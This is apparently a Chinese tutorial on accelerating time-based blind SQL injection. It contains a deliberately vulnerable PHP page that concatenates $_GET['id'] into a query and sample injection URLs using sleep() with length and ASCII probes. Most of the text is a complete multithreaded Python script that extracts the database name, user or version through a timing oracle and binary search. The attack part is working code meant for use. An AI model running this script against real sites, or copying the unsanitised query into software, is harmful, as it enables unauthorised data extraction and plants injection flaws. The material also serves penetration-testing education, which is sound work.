突破延时注入的时间限制-python篇
延时注入 PHP 演示源码（故意留有注入点：`$_GET['id']` 未经任何处理直接拼入 SQL；另外 `mysql_*` 扩展在 PHP 7 中已被移除，此代码仅用于演示，切勿用于生产环境）：
<?php
$link= mysql_connect("localhost","root","root");
mysql_select_db("test",$link);
$sql= "select name from cms where id='{$_GET['id']}'";
echo $sql;
mysql_query($sql);
?>
获取数据库长度
http://www.nvhack.com/sql/sql.php?id=1'and if(length(database()) = 4, sleep(2),1)--+
开始判断数据库字符
http://www.nvhack.com/sql/sql.php?id=1'and if(ascii(substring(database(),1,1)) = 116, sleep(2),1)--+
（116 即字符 't' 的 ASCII 码。）代码如下：
# -*- coding: utf-8 -*-
import datetime
import threading
import time

import requests
# 公用函数:获取数据库名、版本、用户名的长度,参数 getType 为 user()、database()、version() 之一
length: int = 0  # length of the probed value; written by loadDataPublicLength when a length probe matches
def loadDataPublicLength(url, i, getType, afterstr):
    """Probe whether ``length(getType)`` equals ``i`` via the timing oracle.

    On a hit: prints the result, stores ``i`` in the module-level ``length``
    and starts ``getName`` to recover the characters. A miss produces no
    output. Intended to run once per candidate length from ``getLength``.
    """
    global length
    payload = f"{url} and if(length({getType}) = {i}, sleep(2),1){afterstr}"
    if not isTrue(payload):
        return
    print(f'得到结果,长度为:{i}')
    length = i
    getName()
# 公用函数:逐位恢复名字字符,参数 getType 为 user()、database()、version() 之一
nameStr = {}  # recovered characters of the probed value, shared with loadDataPublicName
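def loadDataPublicName(url, i, getType, afterstr, *, max_rounds=64):
    """Recover character ``i`` (1-based) of ``getType`` by binary search over ASCII 32..127.

    Each round sends up to three timing payloads (``>``, ``<``, ``=`` against
    the midpoint) through ``isTrue``. On success the character is stored in
    the module-level ``nameStr`` dict under key ``i`` and the characters
    recovered so far are printed in position order.

    Fixes vs. the original: the result was bound to the global as a plain
    ``str`` (``nameStr = chr(...)``) and then ``nameStr.values()`` was called
    on it, which raises ``AttributeError``; the upper bound 127 was itself
    unreachable (``high`` is now exclusive); and the search looped forever
    when a noisy response made all three probes come back false. ``max_rounds``
    bounds the search (a clean run needs about seven rounds); when exhausted
    the position is recorded as ``'?'`` so the gap is visible and can be re-run.
    """
    low, high = 32, 128  # high is exclusive

    def probe(op, value):
        return isTrue(f"{url} and if(ascii(substring({getType},{i},1)) {op} {value}, sleep(2),1){afterstr}")

    for _ in range(max_rounds):
        mid = (low + high) // 2
        if probe('>', mid):
            low = mid
        elif probe('<', mid):
            high = mid
        elif probe('=', mid):
            nameStr[i] = chr(mid)
            break
        # None of the three probes fired (timing noise): retry the same midpoint.
    else:
        nameStr[i] = '?'
    # Worker threads may finish in any order, so print by position, not insertion order.
    print(''.join(nameStr[k] for k in sorted(nameStr)))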
# 判断是否正确,如果正确返回true
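def isTrue(urlStr, *, delay=2, timeout=30):
    """Timing oracle: return True when the request takes at least ``delay`` seconds.

    The payloads built by the callers make MySQL ``sleep(2)`` when their
    condition holds, so a slow response means "true". The URL is echoed to
    stdout before the request (as in the original) and the response body is
    discarded.

    Changes vs. the original: ``requests.get`` now carries a ``timeout`` (there
    was none, so an unresponsive target blocked the thread for ever; a
    ``requests.exceptions.Timeout`` propagates to the caller), and elapsed time
    comes from ``time.perf_counter`` instead of wall-clock ``datetime.now()``
    truncated to whole seconds. Keep ``timeout`` well above ``delay``.

    Caveat: anything that slows the target — network jitter, or other probe
    threads queuing behind a request that is sleeping — also pushes a "false"
    probe past ``delay``; treat hits as candidates and re-check them.
    """
    print(urlStr)
    started = time.perf_counter()
    requests.get(urlStr, timeout=timeout)
    return time.perf_counter() - started >= delay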
#################获取长度
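def getLength(max_len=19):
    """Probe the length of ``getType`` (1..max_len) with one thread per candidate.

    Reads the module-level ``url``, ``getType`` and ``afterstr`` (set in the
    ``__main__`` block). The matching probe sets the global ``length`` and
    calls ``getName`` from inside its worker thread (see loadDataPublicLength).

    Fix vs. the original: each thread was started and joined in the same loop
    iteration, so the probes ran strictly one after another despite the
    threading. All threads are now started first and joined afterwards.
    Caveat: concurrent probes share the target's worker pool; if the server
    queues requests behind a sleeping one, non-matching probes also exceed the
    delay and the oracle reports false positives — lower ``max_len`` or run
    sequentially on a small target.
    """
    workers = [
        threading.Thread(target=loadDataPublicLength, args=(url, j, getType, afterstr))
        for j in range(1, max_len + 1)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()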
################获取名字的线程,线程数取决于获取数据的长度
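def getName():
    """Recover every character of ``getType`` with one thread per position.

    Thread count is the global ``length`` found by ``getLength``; each worker
    runs ``loadDataPublicName`` for its position using the module-level
    ``url``, ``getType`` and ``afterstr``.

    Fix vs. the original: threads were started and joined inside the same
    loop, which serialised them; they are now started first and joined after.
    Caveat: many simultaneous timing probes can push non-matching requests over
    the delay threshold on a target with a small worker pool, so verify the
    recovered string (positions printed as ``'?'`` were not resolved).
    """
    workers = [
        threading.Thread(target=loadDataPublicName, args=(url, j, getType, afterstr))
        for j in range(1, length + 1)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()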
if __name__ == '__main__':
    # Injection point: the trailing quote closes the id='...' literal of the
    # vulnerable query; every probe appends its own " and if(...)" clause.
    url = 'http://www.nvhack.com/sql/sql.php?id=1\' '
    # Comment marker appended after each payload; use '' if the target needs none.
    afterstr = '--+'
    # Expression to recover: database(), user() or version().
    getType = 'database()'
    getLength()
    # Original author's note: the length probe takes only a few seconds and
    # recovering the name is claimed to be much faster than sqlmap.